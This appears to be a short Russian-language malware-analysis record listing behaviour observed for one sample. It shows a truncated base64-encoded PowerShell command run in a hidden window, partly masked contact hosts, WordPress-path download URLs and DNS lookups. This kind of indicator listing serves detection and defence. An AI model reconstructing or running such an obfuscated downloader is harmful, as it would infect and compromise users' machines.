Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAGoAbAA1AGwANQBnAD0AKAAoACcATAAxACcAKwAnADIAZgBlACcAKQArACcAMQAyACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVABFAE0AcABcAHcAbwByAGQAXAAyADAAMQA5AFwAIAAtAG...
- 'tr##gie.com':443
- 'tr##iue.com':443
- http://po###emo.com/wp-content/V/
- http://ud##77.com/wordpress/J6n/
- DNS ASK po###emo.com
- DNS ASK ud##77.com
- DNS ASK gr####utions.com.au
- DNS ASK pa##a.ae
- DNS ASK la##yie.com
- DNS ASK tr##gie.com
- DNS ASK tr##iue.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAGoAbAA1AGwANQBnAD0AKAAoACcATAAxACcAKwAnADIAZgBlACcAKQArACcAMQAyACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVABFAE0AcABcAHcAbwByAGQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)